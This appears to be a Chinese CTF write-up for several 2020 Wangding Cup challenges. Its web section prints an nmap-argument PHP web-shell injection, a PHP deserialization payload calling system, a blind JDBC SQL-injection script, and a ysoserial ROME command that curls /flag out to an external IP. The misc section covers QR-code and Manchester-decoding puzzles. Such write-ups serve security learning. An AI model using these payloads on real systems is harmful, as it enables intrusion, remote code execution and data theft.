2020 网鼎杯 朱雀之战 部分题解

发表于 分类于 阅读次数:

。赛后秒个题。

Web

nmap

这题考过挺多次了,在线工具

1
' <?php eval($_POST[south]);?> -oN shell.phtml '

phpweb

p=index.php&func=readfile拿到源代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
?>

反序列化绕过。

1
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:26:"cat /tmp/flag_c6bf23b35ba2";s:4:"func";s:6:"system";}

think_java

给了源码,反编译。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
public static Connection getConnection(String dbName, String user, String pass) {
  Connection conn = null;
  try {
    Class.forName("com.mysql.jdbc.Driver");
    if (dbName != null && !dbName.equals("")) {
      dbName = "jdbc:mysql://mysqldbserver:3306/" + dbName;
    } else {
      dbName = "jdbc:mysql://mysqldbserver:3306/myapp";
    } 
    if (user == null || dbName.equals(""))
      user = "root"; 
    if (pass == null || dbName.equals(""))
      pass = "abc@12345"; 
    conn = DriverManager.getConnection(dbName, user, pass);
  } catch (ClassNotFoundException var5) {
    var5.printStackTrace();
  } catch (SQLException var6) {
    var6.printStackTrace();
  } 
  return conn;
}

JDBC注入,dbName?后跟参数表示链接数据库的配置,错误配置会被忽略,因此利用这点注入。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests

session = requests.Session()
res = ""
command = "database()"
for i in range(1, 40):
    for j in range(33, 127):
        paramsPost = {"x": "",
                      "dbName": "myapp?south=1' or if((mid({command},{position},1)='{value}'),1,0)\x23".format(
                          command=command, position=i, value=chr(j))}
        response = session.post("http://123.56.249.239:8088/common/test/sqlDict", data=paramsPost)
        print(paramsPost, len(response.text))
        if len(response.text) > 534:
            res += chr(j)
            print(res)
            break

得到账号密码,admin@Rrrr_ctf_asde/admin

Spring boot有个swagger-ui.html页面用作测试,登陆后给了一串token,推测是个反序列化漏洞,但没给web.xml

ysoserial挨个试,到ROME可用。

1
java -jar ./ysoserial.jar ROME "curl http://122.51.113.164/?`cat /flag`" |base64

Misc

九宫格

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import os
from pyzbar.pyzbar import decode
from PIL import Image

path = "./QRcode/"
images = os.listdir(path)
images.sort(key=lambda x: int(x[:-4]))
res = ""
for i in images:
    img = Image.open(path + i)
    barcodes = decode(img)
    for barcode in barcodes:
        res += barcode.data.decode("utf-8")
b = res.replace("zero", "0").replace("one", "1")
d = int(b, 2)
h = hex(d)
print(bytes.fromhex(h[2:]))

# b'U2FsdGVkX19jThxWqKmYTZP1X4AfuFJ/7FlqIF1KHQTR5S63zOkyoX36nZlaOq4X4klwRwqa'

读一下二维码,结果加了盐,根据提示,九宫格的对角线为245568Rabbit解密。

key123

根据提示输入密码为123,得到两个图。

匙.png修复高度。

1
295965569a596696995a9aa969996a6a9a669965656969996959669566a5655699669aa5656966a566a56656

差分曼彻斯特。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import struct
import math


def long_to_bytes(n):
    s = b''
    pack = struct.pack
    while n > 0:
        s = pack('>I', n & 0xffffffff) + s
        n = n >> 32
    for i in range(len(s)):
        if s[i] != b'\000'[0]:
            break
    else:
        s = b'\000'
        i = 0
    s = s[i:]
    return s

def MCST_diff(str_bin):
    ret = ''
    for i in range(0, len(str_bin) // 2 - 1):
        x1 = str_bin[i * 2:i * 2 + 2]
        x2 = str_bin[i * 2 + 2:i * 2 + 4]
        if x1 == x2:
            ret += '0'
        else:
            ret += '1'
    return ret


str_hex = '295965569a596696995a9aa969996a6a9a669965656969996959669566a5655699669aa5656966a566a56656'
str_bin = str(bin(int(str_hex, 16)))[2:]
m = MCST_diff(str_bin)
print(long_to_bytes(int(m, 2)))

# b'\x13akura_Love_Strawberry'

猜个前面是S,密码为Sakura_Love_Strawberry

binwalk解析锁.png,拿到加密文件,输入密码,得到flag